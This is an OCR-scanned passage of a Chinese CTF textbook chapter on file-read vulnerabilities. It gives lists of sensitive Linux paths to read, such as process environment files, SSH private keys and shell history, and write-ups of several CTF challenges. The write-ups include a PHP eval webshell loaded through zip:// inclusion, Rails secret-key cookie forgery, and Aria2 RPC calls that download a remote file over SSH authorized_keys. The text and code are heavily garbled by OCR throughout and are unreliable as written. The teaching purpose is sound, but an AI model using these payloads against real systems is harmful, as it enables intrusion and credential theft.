对 应 目录 下 的 cmdline 可 读 出 比较 敏感 的 信息 ， 如 使 用 mysql-uxxx-pxxxx 登 录 CySQL， 会 在 


cmdline 
中 显示 明文 密码 : 
ee CTpia] 关 向 进程 所 对 应 的 终 叶 人 3 
有 时 我 们 无 法 获取 当前 应 用 所 在 的 目录 ， 通 过 cwd 命 令 可 以 直接 跳 转 到 当前 目录 : 
nr CLpid] 将 和 各 的 运 和 目录) 


环境 变量 中 可 能 仔 在 secret_key， 这 时 也 可 以 通过 environ 进 行 读 取 : 


/proc/[pid]/environ ([pid] 指 向 进程 运行 时 的 环境 变量 ) 


(15) 其 他 目录 


Nginx 配 置 文件 可 能 存在 其 他 路 径 : 


/usr/local/nginx/conf/* ( 源 代 码 安装 或 其 fe 统 ) 
日 千 
NS w . 


/var/log/* (经 常 出 现 Apache2 的 Web 应 用 可 读 /var/log/apache2/access.log 
从 而 分 析 日 志 ， 盗 取 其 他 选手 的 解 题 步骤 ) 


Apache 默 认 Web 根 目录 : 


/var/www/html/ 


PHP session 目 录 : 


/var/lib/php(5)/ 
用 户 目 录 : 


[user_dir_you_know]/.bash_history (泄露 历史 执行 命令 ) 
[user_dir_you_know]/.bashrc (部 分 环境 变量 ) 
[user_dir_you_know]/.ssh/id_rsa(.pub) (ssh 登录 私 乌 / 公 铀 ) 
[user_dir_you_know]/.viminfo 《vim 使 用 记录 ) 


[pid] 指 向 进程 所 对 应 的 可 执行 文件 。 有 时 我 们 想 读 取 当 前 应 用 的 可 执行 文件 再 进行 分 析 ， 但 在 实际 利 


用 时 可 能 存在 一 些 安全 措施 阻止 我 们 去 读 可 执行 文件 ， 这 时 可 以 尝试 读 取 /proc/self/exe。 例 如 : 
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/proc/[pid]/fd/(112…) ( 读 取 [pid] 指 向 进程 的 stdout 或 stderror 或 其 他 ) 

/proc/[pid]/maps ([pid] 指 向 进程 的 内 存 映 射 ) 

/proc/[pid]/(mounts|mountinfo) A CTF 常见 的 是 Docker 环境 
b unts 会 港 露 一 些 敏感 路 径 

/proc/[pid]/net/* Cp4a] 者 向 进程 的 网 络 信息 ， 0 TCP 将 获取 进程 所 绑 定 的 TCP 端口 
ARP 将 泄露 同 网 段 内 网 IP 信息 ) 


1.3.2.2 Windows 


Windows 系 统 下 的 Web 应 用 任意 文件 读 取 漏洞 在 CTF 赛 题 中 并 不 常见 ， 但 是 Windows 与 PHP 搭 配 使 
用 时 存在 一 个 问题 : 可 以 使 用 “<” 等 符号 作为 通配符 ， 从 而 在 不 知道 完整 文件 名 的 情况 下 进行 文件 
读 取 ， 这 部 分 内 容 会 在 下 面 的 例题 中 详细 介绍 。 


1.3.3 文件 读 取 漏 润 例 题 


根据 大 量 相关 CTF 真 题 的 整理 ， 本 节 介 绍 文 件 读 取 漏 洞 的 实战 ， 硕 望 参 赛 者 在 阅读 后 仔细 总 结 ， 丈 练 
掌握 ， 对 日 后 解 题 会 有 很 大 帮助 。 


1.3.3.1 兵 首 多 诡 (HCTF 2016) 


【题目 简介 】 在 home.php 中 人 存在 一 处 include 函 数 导 致 的 文件 包含 漏 词 ， 传 至 include 了 为数 的 路 径 参 
数 前 半 部 分 攻击 者 可 控 ， 后 半 部 分 内 容 确定 ， 不 可 控 部 分 是 后 缀 的 .php。 


$fp = empty($_GET['fp']) ? 'faiL' : $_GET['fp']; 
if(preg_match('/\.\./', $fp)){ 
die('No No No!'); 


} 

if(preg_match('/rm/i', $_SERVER["QUERY_STRING"])){ 
die(); 

} 


if($fp !== 'fail') 


在 upload.php 处 存在 文件 上 传 功能 ， 但 上 传 至 服务 器 的 文件 名 不 可 挥 。 


// function.php 
function create_imagekey(){ 

return shal($_SERVER['REMOTE_ADDR'] .$_SERVER['HTTP_USER_AGENT'] .time().mt_rand()); 
} 


//upload.php 

$imagekey = create_imagekey(); 

move_uploaded_file($name, "uploads/$imagekey.png"); 

echo "<script>location.href='?fp=show&imagekey=$imagekey'</script>"; 


【题目 难度 】 中 等 。 
【知识 点 】php:// 协 议 的 Filter 利 用 ; 通过 zip:// 协 议 进 行文 件 包含 。 


【 解 题 思路 】 打 开题 目 ， 友 现 首 页 只 有 一 个 上 传 表 单 ， 先 上 传 一 个 正常 文件 进行 测试 。 通 过 对 上 传 的 
数据 进行 抓 包 ， 发 现 POST 的 数据 传输 到 了 “? fp=upload”， 接着 跟随 数据 跳 转 ， 会 发 现 结果 跳 转 


到 “? fp=show&imagekey=xxx” 。 

从 这 里 开始 ， 参 赛 经 验 程 度 不 同 的 参赛 者 的 思考 方向 会 产生 差异 。 

(1) 第 一 步 

新 手 : 继续 测试 文件 上 传 的 功能 。 

有 经 验 的 参赛 者 : 看 到 fp 参数 ， 会 联想 到 file pointer， 即 fp 的 值 可 能 与 文件 相关 。 
(2) 第 二 步 


接 下 来 的 差异 会 在 第 一 步 的 基础 上 继续 扩大 。 
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新 手 玩家 : 这 个 文件 上 传 的 防护 机 制 到 底 该 怎样 绕 过 ? 
有 经 验 的 参赛 者 : 直接 访问 show.php、upload.php， 或 者 想 办 法 寻找 文件 中 名 含有 show、upload 
等 特殊 含义 的 PHP 文 件 , 或 者 把 show/upload 改 成 其 他 已 知 文件 "home"。 


更 有 经 验 的 参赛 者 : 将 fp 参数 的 内 容 改 为 “./show”“../html/show” 等 。 我 们 无 法 得 知 文件 包 合 的 
目标 文件 具体 路 径 是 什么 ， 如 果 是 一 个 很 奇怪 的 路 径 ， 融 无 法 找到 其 原始 PHP 文 件 ， 这 时 “./show- 
形式 能 很 好 地 解决 这 个 困难 ， 进 而 轻松 地 判断 这 里 是 否 存 在 任意 文件 包含 漏洞 。 


(3) 第 三 步 
新 手 : 这 章 题 一 定 需要 0day 才 能 绕 过 防护 ， 我 可 以 放 和 并 了 。 


有 经 验 的 参赛 者 : 根据 直接 访问 “show.php/upload.php” 和 “? fp=home” 的 结果 ， 判 断 这 里 
是 一 个 include 文 件 包 合 。 利 用 Filter 机 制 ， 构 造形 如 “php://filter/convert.base64-encode/ 

-xxoc 的 攻击 数据 读 取 文件 ， 拿 到 各 种 文件 的 源码 ; 利用 zip:// 协 议 ， 搭 配 上 传 的 Zip 文 件 ， 包 
含 一 个 压缩 的 Webshell 文 件 ; 再 通过 zip:// 协 议 调 用 压缩 包 中 的 Webshell， 访 问 这 个 Webshell 的 链 
接 为 


?fp=zip://uploads/feSe :png%231&shell=phpinfo(); 
feSelcy3e6e6bcfd506f0307e8ed6ec7Tecc3821d.png (zipfile) 
~ 1.php (phpfile) => "<?php eval($_GET['shell']);?>" 


(CIRODNE bl A |=]: 
测试 思路 ， 上 面 所 写 的 思路 仅 供 参考 。 在 进行 黑 盒 测试 时 ， 我 们 要 善于 捕获 参数 中 的 天 键 词 ， 并 且 具 
有 一 定 的 联想 能 力 。 


Q@) 考 坦 了 参赛 者 对 Filter 的 利用 ， 如 php:/WfilteVconvert.Base64-encode (将 文件 沅 通过 Base64 
进行 编码 ) 。 


@) 考 得 了 选手 对 zip:// 协 议 的 利用 : 将 文件 流 视 为 一 个 Zip 文 件 沅 ， 同 时 通过 “# ” (〈%23) 选 出 压缩 
包 内 指定 文件 的 文件 流 。 


读者 可 能 不 太 理解 第 @ 点 ， 下 面具 体 说 明 。 我 们 上 传 一 个 Zip 文 件 至 服务 器 ， 当 通过 zip:// 协 议 解析 这 
个 压缩 文件 时 ， 会 自动 将 这 个 Zip 文 件 按照 压缩 时 的 文件 结构 进行 解析 ， 然 后 通过 “# (对 应 URL 编 
码 %23) + 文件 名 ”的 方式 对 Zip 内 部 所 压缩 的 文件 进行 索引 (如 上 面 的 例子 就 是 内 部 存储 了 个 名 为 1. 
php 的 文件 。 这 时 整个 文件 流 被 定位 到 1.php 的 文件 流 ， 所 以 include 实 际 包含 的 内 容 是 1.php 的 内 
容 ， 具 体 解析 流程 见 图 1-3-3。 


全 1-3- 


1.3.3.2 PWNHUB-Classroom 


【题目 简介 】 使 用 Django 框 避 开 及 ， 并 通过 不 安全 的 方式 配置 静态 资源 目录 。 


#urLs .py 
from django.conf.urls import url 
from.import views 
erns = [url('*$', views.IndexView.as_view(), name='index'), 
url('^login/$', views.LoginView.as_view(), name='login'), 
url('^logout/$', views.LogoutView.as_view(), name='Logout'), 
url('"static/(?P<path>.*)', views.StaticFilesView.as_view(), name='static')] 


##vViews .py 


class StaticFilesView(generic.View): 
content_type = 'text/plai 


def get(self, request, x*args, **kwargs): 
filename = self.kwargs['path'] 
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filename = os.path.join(settings.BASE_DIR, “Students'"， "Static"，fiLename) 
name, ext = os.path.splitext(filename) 
3f ext in ("pyr .conf', Vsqlited, -VALU): 
raise exceptions.PermissionDenied('Permission deny') 
try: 
return HttpResponse(FileWrapper(open(filename, 'rb'), 8192), 
content_type=self.content_type) 
except BaseException as e: 
raise Http494('Static file not found') 


【题目 难度 】 中 等 。 


【知识 点 】Python (Django) 静态 资源 逻辑 配置 错误 导致 的 文件 读 取 漏 洞 ; Pyc 字 节 码 文件 反 编 
译 ; Django 框架 ORM 注 入 。 


【 解 题 思路 】 第 一 个 漏洞 : 代码 先 匹 配 到 用 户 传 入 的 URL 路 径 static/ 后 的 内 容 ， 再 将 这 个 内 容 传 入 os. 
pathjoin ， 与 一 些 系 统 内 定 的 目录 拼接 后 形成 一 个 绝对 路 径 ， 然 后 进行 后 缀 名 检查 ， 通 过 检查 ， 该 绝 
对 路 径 将 传 入 open() 遂 数 ， 读 取 文件 内 容 并 返回 用 己 。 


第 二 个 漏洞 : views.py 的 类 LoginView 中 。 可 以 看 到 ， 将 用 户 传 入 的 JSON 数 据 加 载 后 ， 加 载 得 到 的 
数据 直接 被 代入 了 x.objects.filter (Django ORM 原 生 晃 数 ) 。 


class LoginView(JsonResponseMixin, generic.TemplateView): 
template_name = 'Login.htmtL' 
def post(self, request, x*args, **kwargs): 
data = json.loads(request .body .decode()) 
stu = models.Student .objects.filter(**data).first() 
if not stu or stu.passkey != data['passkey']: 
return self._jsondata('', 403) 
else: 
request.session['is_login'] = True 
return self._jsondata('', 200) 


先 打 开题 目 ， 看 到 HTTP 返 回头 部 中 显示 的 Server 信 息 : 

我 们 可 以 得 知 题目 是 使 用 Python 的 Django 框 架 开 发 的 ， 当 遇 到 Python 题目 没有 给 源码 的 情况 时 ， 可 
以 第 一 时 间 尝 试 是 否 存 在 目录 穿越 相关 的 漏 间 (可 能 是 Nginx 不 安全 配置 或 Python 框架 静态 资源 目录 
不 安全 配置 ) ， 这 里 使 用 “/etc/passwd” 作 为 文件 读 取 的 探 针 ， 请 求 的 路 径 为 : 

可 以 发 现任 意 文 件 读 取 漏洞 的 确 存在 ， 但 在 随后 尝试 读 取 Python 源 代码 文件 时 发 现 禁用 了 几 个 常见 的 
后 缀 名 ， 包 括 Python 后 缀 名 、 配 置 文 件 后 缀 名 、Ssdqlite 后 缀 名 、YML 文 件 后 缀 名 : 


在 Python 3 中 运行 Python 文件 时 ， 对 于 运行 的 模块 会 进行 缓存 ， 并 存放 在 _pycache_ 目 录 下 ， 其 中 
pyc 字 节 码 文件 的 命名 规则 为 : 


module_name]+".cpython-3"+[\d](python3 小 版 本 号 )+" .pyc" 


_pycache_/views.cpython-34.pyc 是 一 个 文件 名 的 示例 。 这 里 其 实 考 查 的 是 对 Python 的 了 解 和 
jlalele 
目录 结构 的 认 知 。 


将 请 求 的 文件 路 径 更 换 为 符合 上 面 规 则 的 路 径 : 

成 功 地 读 取 了 PYC 字 节 码 文件 。 继 续 读 取 所 胰 余 的 PYC 文 件 ， 再 反 编 译 PYC 字 节 码 文件 获取 源 代 
码 。 通 过 对 获得 的 源码 进行 审计 ， 我 们 发 现存 在 ORM 注 入 漏洞 ， 继 续 利 用 该 注入 漏洞 便 可 得 到 flag 内 
容 ， 见 图 1-3-4。 


filter( fheld_lookuptype = value ) 
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关键 词 参数 (可 自行 查阅 文档 ) 
exact 
iexact 
containts 


图 1-3-4 


CAIRO ES :d= ES 4 
和 近 巧 ， 需 要 通过 大 量 的 实 跤 积 宗 。 


题目 所 用 的 环境 和 Web 应 用 框架 。 即 使 参赛 者 刚 开始 时 不 熟悉 ， 也 要 快速 搭建 并 学 习 该 环境 、 
架 的 特性 ， 或 者 翻 看 查阅 手册 。 注 意 : 快速 搭建 环境 并 学 习 特 性 是 CTF 参 赛 者 进行 Web 比 赛 的 基本 


@@ 黑 盒 测试 出 目录 穿越 漏洞 ， 进 而 进行 任意 文件 读 取 。 


@ 源 代码 审计 ， 根 据 @ 所 述 ， 了 解 框 杂 特 性 后 ， 通 过 ORM 注 入 获得 flag。 


1.3.3.3 Show me the shell I(TCTF/OCTF 2018 Final) 


【题目 简介 】 题 目的 漏洞 很 明显 ，UpdateHead 方 法 残 是 更 新 头像 功能 ， 用 户 传 入 的 URL 的 协议 可 以 
为 File 协 议 ， 进 而 企 Pownload 方 法 中 触 上 友 URL 组 件 的 任意 文件 读 取 漏 洞 。 


// UserControLLer .cLass 


ee {"/headimg.do"}, 
method={org .springframework .web.bind.annotation.RequestMethod .GET}) 
public void UpdateHead(@RequestParam("url") String url) 


String downLoadPath = this.request .getSession().getServletContext().getRealpath("/")+"/headimg/"; 
String headurl = "/headimg/" + HttpReq.Download(url, downloadPath); 
User user = (User)this.session.getAttribute("user"), 
Integer uid = user.getId(); 
this.userMapper.UpdateHeadurl(headurl, uid); 
让 


// HttpReq.class 


public static String Download(String urlString, String path) 
{ 
String filename = "default.jpg"; 
if (endWithImg(urlString)) { 
try 
{ 
URL url = new URL(urlString); 
URLConnection urlConnection = url.openConnection(); 
urlConnection.setReadTimeout(5000); 
int size = urlConnection.getContentLength(); 
if (size < 10240) 
InputStream is = urlConnection.getInputStream(); 


【题目 难度 】 人 简单 。 
【知识 点 】Java URL 组 件 通过 File 协 议 列 出 目录 结构 ， 进 而 读 取 文 件 内 容 。 
【 解 题 思路 】 对 Java class 字 节 码 文件 进行 反 编译 (JD) ; 通过 代码 审计 ， 友 现 源码 中 存在 的 漏洞 


【总 结 】 人 参赛 者 要 积 昧 一 定 的 经 验 ， 了 解 URL 组 件 可 使 用 的 协议 ， 赛 后 分 享 见 图 1-3-5。 


com.tctf.utils.HttpReq#Download 
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图 1-3-5 


1.3.3.4 Babylntranet I(SCTF 2018) 


【题目 简介 】 本 题 采 用 了 Rails 框 纺 进 行 开 友 ， 存 企 Ruby On Rails 远 程 代 码 执行 漏洞 Cl 
) ， 可 以 被 任意 读 取 文件 (该 漏洞 其 实质 是 动态 文件 泻 染 ) 。 


params[:tempLate] 


通过 读 取 源码 发 现 ， 该 应 用 程序 使 用 了 Rails 的 Cookie-Serialize 模 块 ， 通 过 读 取 应 用 的 密 钥 ， 构 造 恶 
ES 


#config/initializers/cookies_serializer.rb 
Rails.application.config.action_dispatch.cookies_serializer = :json 


【题目 难度 】 中 等 。 
【知识 点 】Ruby On Rails 框 架 任 意 文件 读 取 漏洞 ; Rails cookies 反 序列 化 。 


【 解 题 思路 】 对 应 用 进行 指纹 探测 ， 通 过 指纹 信息 友 现 是 通过 Rails 框 架 开 友 的 应 用 ， 接 着 可 以 在 ey 
源码 中 友 现 链接 /layouts/c3Jj X21w， 对 软 链接 后 面 的 部 分 进行 Base64 解 码 ， 友 现 内 容 是 src_ 

。 查阅 Rails 有 关 漏 洞 友 现 动态 模板 泻 染 漏洞 (CVE-2016-0752) ， ee 

码 成 Base64 放 在 layouts 后 ， 成 功 返 回 /etc/passwd 文 件 的 内 容 。 


尝试 泻 染 日 志文 件 (../log/development.log) 和 直接 进行 代码 执行 失败 ， 友 现 没 权限 泻 染 这 个 文 

件 ， 接 着 读 取 所 有 可 读 的 代码 或 配置 文件 ， 发 现 使 用 了 cookies serializer 模 块 。 尝 试 读 取 当前 用 户 环 

境 变量 发 现 没 权 限 ， 于 是 尝试 读 取 /proc/selWenviron， 获 取 到 密 钥 后 ， EAM A 
反 序 列 化 攻击 模块 直接 攻击 。 


【总 结 】@@ 通 过 Ruby On Rails 远 程 代码 执行 漏洞 (CVE-2016-0752) 进行 任意 文件 读 取 (出 题 人 对 
漏洞 代码 进行 了 一 定 程度 的 修改 ， 使 用 了 Base64 编 码 ) ， 见 图 1-3-6。 


后 ee 4 
名 BM localhost:3000/users/%2fetc%2fpasswd 


a 
information is provided by # Open Directory. ## See the opendirectoryd(8) man page for ac 
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrato; 
Services:/var/root:/usr/bin/false _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/u 
Daemon:/var/empty:/usr/bin/false _networkd:*:24:24:Network Services:/var/networkd:/usr/l 
Assistant:/var/empty:/usr/bin/false _lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/fal 
/spool/postfix:/usr/bin/false _scsd:*:31:31:Service Configuration Service:/var/empty:/usr/bir 
Service:/var/empty:/usr/bin/false _mcexalr:*:54:54:MCX AppLaunch:/var/empty:/usr/bin/fal 
Daemon:/var/empty:/usr/bin/false _geod:*:56:56:Geo Services Daemon:/var/db/geod:/usr/bi 


图 1-3-6 
服务 器 禁止 了 Log 日 志 的 读 取 权限 ， 因 此 不 能 直接 通过 泻 染 日 志 完 成 getshell。 通 过 读 取 源码 ,我 


们 可 以 发 现 应 用 中 使 用 了 Rails 的 Cookie-Serialize 模 块 。 整 个 模块 的 处 理 机 制 是 将 和 真正 的 session_， 
序列 化 后 通过 AES-CBC 模 式 加 密 ， 再 用 Base64 编 码 2 次 ， 处 理 流 程 见 图 1-3-7。 


ata 
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sonen Dut | 


图 1-3-7 
从 服务 器 返回 的 Set-Cookie 也 能 印证 这 一 点 ， 见 图 1-3-8。 


Set-Cookie: 

_BabyIntranet session=UG5BYkdHBMHZWbEdHbmS5aY103TORZQXd3Wk 
E00EVRb3BkQnFPN056SnE3Snlhawt0V0F5Y1NqROVIW09PVjEFFcDhSW 
DZVVXVPZUVLVislMZzNwS21DTUSEOE9NYKk850WhBdEVna21l1nRjFtL2VD 
a2lJCcXPpVRFhNZSG1CTKRBMHdiUkl1WRFUOMMES5L29VMDJpS1NwUnNnFZbEV 
YU3JQSEArVEPNR3PORXBBbFhvMkwxeU92NzdCN251LZzVCQKPOVWVLS1 
Nl1LSOrRVdwWisrNWoS5Q3p5ekpuRzZzJGMGdnPT0%3D--e67c681e7cd34 
ba9d58af6b745abe4aa90clac72; path=/; HttpOonly 


图 1-3-8 


我 们 可 以 通过 任意 文件 读 取 漏 洞 获 取 /proc/self/environ 的 环境 变量 ， 找 到 AESs 加 密 所 使 用 的 secret 
key， 接 着 借助 secret key 伪造 序列 化 数据 。 这 样 ， 当 服务 妆 反 序列 化 时 ， 惑 会 触 皮 漏洞 执行 乏 意 代 
见 图 1-3-9。 


aby/.local/bin:/home/baby/.rvm/gems/ruby-2.3.3Q@global/b 
in:/home/baby/ .rvm/rubies/ruby-2.3.3/bin:/usr/local/sbi 
n:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin: : 
es:/usr/local/games:/home/baby/ .rvm/bin 


PHD=/home/baby/BabyIntranetLANG=en_US 
-UTF-8_system_arch=x86_64_system version=16.04rvm versi 
on=1.29.3 
(latest)SHLVL=1XDG SEAT=seatOHOME=/home/babyLANGUAGE=en 


图 1-3-=9 


1.3.3.5 SimpleVN(BCTF 2018) 


【题目 简介 】 题 目的 功能 主要 分 为 如 下 两 点 。 


(1) 用 尸 可 以 设置 一 个 模板 用 来 被 泻 染 ， 但 是 这 个 模板 设置 有 一 定 的 限制 ， 
数 子 。 另 外 ， 泻 染 模 板 的 功能 只 允许 127.0.0.1 (本 地 ) 请 求 。 


const checkPUG = (upug) => { 


const fileterkeys = ['global', 'require'] 
return /*[a-zA-z0-9\.]*$/g.test(upug) && !fileterkeys.some(t => upug.toLowerCase().includes(t)) 
} 


console.log('Generator pug template') 
const uid = req.session.user.uid 
const body = ‘#{${upug}}. 
console.log('body', body) 
const upugPath = path.join('users', utils.md5(uid), ‘${uid}.pug') 
console.log('upugPath', upugPath) 
try { 
fs.writeFileSync(path.resolve(config.VIEWS_PATH, upugPath), body) 
} 
catch (err) { 


(2) 题目 中 存在 一 个 代理 请 求 的 服务 ， 用 户 输入 URL 并 提交 ， 后 端 会 局 动 Chrome 浏 览 器 去 请 求 这 个 
URL， 并 把 请 求 页 面 截图 ， 反 馈 给 用 户 。 当 然 ， 用 户 提 人 交 的 URL 也 有 一 定 限 制 ， 必 须 是 本 地 配置 的 AS 

(127.0.0.1) 。 这 里 存在 一 个 问题 ， 束 是 我 们 传 入 File 协 议 的 URL 中 的 HOST 部 分 是 空 的 ， 所 以 也 
可 以 绕 过 这 个 检查 。 


const checkURL = (shooturl) => { 

const myURL = new URL(shooturl) 

return config.SERVER_HOST.includes(myURL.host) 
} 


【题目 难度 】 中 等 。 


【知识 点 】 浏 览 器 协议 支持 及 view-source 的 利用 ; Node 模板 注入 ; HTTP Request Header: 3 
ange 


oo 
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A 
取 flag 的 路 径 ， 并 读 取 flag 的 内 容 。 


const FLAG_PATH = path.resolve(constant .ROOT_PATH, “类 类 类 炎炎 关 炎 炎 


const FLAGFILENAME = process.env.FLAGFILENAME | | ‘wxxxxx***! 


通过 模板 注入 process.env.FLAGFILENAME 获 取 flag 文 件 名 ， 获 取 整 个 Node 应 用 所 在 目录 process. 
.PWD， 使 用 view-source: 输出 被 解析 成 HTML 标 签 的 结果 ， 见 图 1-3-10。 


enV 


</home/pptruser/app/simplev2><//home/pptruser/app/simplev2> 
图 1-3-10 


使 用 file://+ 绝 对 路 径 读 取 config.js 中 的 FLLAG PATH， 见 图 1-3-11。 


读 取 flag 内 容 ， 使 用 HTTP 请 求 头 的 Range 来 控制 输出 的 开始 字 节 和 结束 字 节 。 题 目 中 的 flag 文 件 内 容 
很 多 ， 直 接 请 求 无 法 输出 真正 flag 的 部 分 ， 需 要 从 中 间 戴 断 开始 输出 ， 见 图 1-3-12， 


const path = requlire( "path ') 

const constant = require('../constant') 

const STATIC_PATH = path.resolve(constant .ROOT —PATH, "public') 

const FLAG_PATH = path.resolve(constant .ROOT_PATH, 'F8F168F9- 9BF9- 4929-A48C-3791F6DAFB12 


const SCREENSHOT_PATH = path.resolve(STATIC_PATH, "screenshots ') 
ATH = path.resolve(constant .ROOT_PATH 


图 1-3-11 
5 bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb 
bbbbbc 


§ CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC 


cece 

7 ddddddddddddddddddddddddddBCTF{3468EB8A-BF69-4735-A948- 
4D96E2B1A7A9}ddddddddddddddddddddddddddddddde 

3 eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee 


eeeeef 
9 Fffffffffffffffffffffffffftfftftfffftftftftftffffftftftftfffftftftftftfffftftftftftfffftftftftftffffftftftftfffftftfffftffffffff 
fffff 


20 tn 
9g9999g, 

u hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh 
hhhhhi 


图 1-3-12 


【总 结 】@ 题 目 中 的 任意 文件 读 取 其 实 与 Node 并 无 太 大 关系 ,实质 上 是 利用 浏览 器 支持 的 协议 ， 属 
于 比较 新 甘 的 题目 。 


@ 读 取 文件 的 原则 是 按 需 读 取 而 不 盲目 读 取 ， 盲 目 读 取 文 件 内 容 会 瀛 费时 间 。 


同样 使 用 浏览 器 特性 有 关 的 题目 还 有 同 场 比赛 的 SEAFARING2， 通 过 SSRF 漏 洱 攻 击 selenium 
， 控 制 浏览 器 请 求 file:/// 读 取 本 地 文件 。 读 者 如 果 感 兴趣 可 以 搜寻 这 道 题 。 


serVver 


1.3.3.6 Translate(Google CTF 2018) 


【题目 简介 】 根 据 题目 返回 的 userQuery}}， 我 们 容易 想到 试 一 下 模板 注入 ， 使 用 数学 表达 陈 {{3* 
3}} 进 行 测试 。 


"in_lang_query_is_spelled": "In french, <b>{{userQuery}}</b> is spelled 
<b ng-bind=\"il8n.word(userQuery)\"></b>.", 


AN 


hh (demo') .invokeQueue[3][2][1]}} 读 
取 部 分 代码 ， 发 现 使 用 了 i18n.template 演 染 模 板 ， 通 过 i18n.template ('./flag.txt') 读 取 flag。 


($compile, $sce, il8n) =>; { 
var recursionCount = 0; 
return { 
rostrict: "AY 
link: (scope, element, attrs) =>; { 
if (!lattrs['myInclude'].match(/\.html$|\.js$|\.json$/)) { 
throw new Error(‘Include should only include html, json or js files 5_9°); 
} 


recursionCount++; 


if (recursionCount >= 20) { 
// ng-include a template that ng-include a template that... 
throw Error(‘That's too recursive 5d_9°); 
} 
element.html(il8n.template(attrs['myInclude'])); 
$compile(element.contents())(scope); 


【题目 难度 】 中 等 。 
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【知识 点 】Node 模 板 注 入 ; i18n.template 读 flag。 


【 解 题 思路 】 先 友 现 模板 注入 ， 利 用 模板 注入 搜集 信息 ， 在 已 有 信息 的 基础 上 ， 利 用 模板 注入 ， 调 用 
可 恋 文 件 的 函数 进行 文件 读 取 。 


【总 结 】 涉 及 Node 模 板 注 入 的 知识 ， 需 要 参赛 者 对 其 机 制 有 所 了 解 ;模板 注入 转换 成 文件 读 取 漏 
洞 。 


1.3.3.7 看 瘟 惑 能 拿 Flag (PWNHUB) 


【题目 简介 】 扫 描 子 域名 ， 发 现 有 一 个 站 点 记录 了 题目 搭建 过 程 (blog.loli.network) 。 


发 现 Nginx 配 置 文件 如 下 : 


ocation /bangumi { 
alias /var/www/html/bangumi/; 


ocation /admin { 
alias /var/www/html/yaaw/; 


31-May-2617 23:56 
31-May-2817 84:16 
31-May-2817 84:16 
83-Jun-2817 18:53 
83-Jun-2817 11:83 
83-Jun-2917 16:66 
31-May-2617 23:56 
31-May-2617 84:16 


图 1-3-12 
同时 发 现在 题目 的 6800 端 口 开放 了 Aria2 服 务 。 


enable-rpc=true 

rpc-allow-origin-all=true 

seed-time=0 

disable-ipv6=true 

rpc-listen-all=true 
rpc-secret=FLAG{infactthisisnotthecorrectflag} 


【题目 难度 】 中 等 。 
【知识 氮 】Nginx 钳 误 配 置 导 致 目 录 穿 越 ; Aria2 任 意 文 件 写 入 漏洞 。 


【 解 题 思路 】 先进 行 必要 的 信息 搜集 ， 包 括 目 录 、 子 域名 等 。 在 测试 的 过 程 中 发 现 Nginx 配 置 错误 
(依据 前 面 的 信息 搜集 到 Nginx 配 置 文件 ， 也 可 以 进行 黑 盒 测试 。 黑 盒 测 试 很 重要 的 就 是 对 Nginx 的 

特性 及 可 能 人 存在 的 漏洞 很 了 解 。 这 也 可 以 节省 我 们 信息 搜集 所 需要 的 时 间 ， 直 接 切 入 第 二 个 漏洞 

点 ) 。 利 用 Ngnix 目 录 穿 越 获 取 Aria2 配 置 文件 ， 拿 到 rpc-secret。 再 借助 Aria2 任 意 文 件 写 入 漏洞 ， 
2 的 API 需 要 token 也 融 是 rpc-secret 才 可 以 调用 ， 前 面 获取 的 rpc-secret 便 能 起 作用 了 。 


调用 api 李 置 allowoverwrite 为 true: 


{ 

"jsonrpe” "2.0" 

"method":"aria2.changeGLlobalOption", 

hi 这 

"params": 

[ 
"token:FLAG{infactthisisnotthecorrectflag}", 
{ 


"allowoverwrite": "true" 


然后 调用 API 下 载 远程 文件 ， 履 兰 本 地 任意 文件 (这 里 直接 覆盖 33H 公 钥 ) ，SSH 登 录 获 取 flag.。 


{ 
Wsonrpe": .20" 
"method": "aria2.addUri", 
Sid": 
"params": 
r 
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"token:FLAG{infactthisisnotthecorrectflag}", 

LhEtpe /xX XL tt 

{ 
"dir":"/home/bangumi/.ssh", 
"out":"authorized_keys" 

} 

| 
1 


1.3.3.8 2013 那 年 (PWNHUB) 


【题目 简介 】 (1) 友 现 存在.DS _Store 文 件 ， 见 图 1-3-13。 


OO OaQdOmnOiQnvsrnlong O00 O00 OcO OOIOiQgIldb1o O00 O00 O00 000000004 
OO OOOOOIOiQgvsrnlong O00 AA SA NA pdOeQsIlocblop O00 O00 O000.0004 
Dey Ou 


ped /ONOIOiOnOxO 919.09409.96919h4 


p00 0 00 OPO1 0000 IlocblobpOO©0 O000000000004 
> EO OPO1 O00a0dO vSrnlong@@@d 


图 1-3-13 


(2) .DS_Store 文 件 港 露 当前 目录 结构 ， 通 过 分 析 .DS_Store 文 件 友 现存 在 upload、pwnhub 等 目 
录 。 


(3) pwnhub 目 录 人 在 Nginx 文 件 里 被 配置 成 芙 止 访问 (比赛 中 前 期 无 法 拿 到 Nginx 配 置 文 件 ， 只 能 通 
过 HTTP code 403 来 判断 ) ， 配 置 内 容 如 下 : 


Location /pwnhub/ { 
deny all; 
; 


(4) pwnhub 和 存在 隐藏 的 同 级 目录 ， 其 下 的 index.php 文 件 可 以 上 传 TAR 压 缩 包 ， 且 调用 了 Python 
脚本 自动 解压 上 传 的 压缩 包 ， 同 时 返回 压缩 包 中 文件 后 缀 名 为 .cfg 的 文件 内 容 。 


<?php 

// 设置 编码 为 UTF-8， 以 避免 中 文 乱码 

header('Content-Type:text/html ;charset=utf-8'); 

# 没 文件 上 传 就 退出 

$file = $_FILES['upload']; 

# 文件 名 不 可 预测 性 

$salt = Base6d_encode('8gss7sd09129ajcjai2283u821hcsass').mt_rand(89,65535); 

$name = (md5(md5($file['name'].$salt).$salt).'.tar'); 

if (!isset($_FILES['upload']) or !is_uploaded_file($file['tmp_name'])) { 
exit; 

} 

# 移动 文件 到 相应 的 文件 夹 

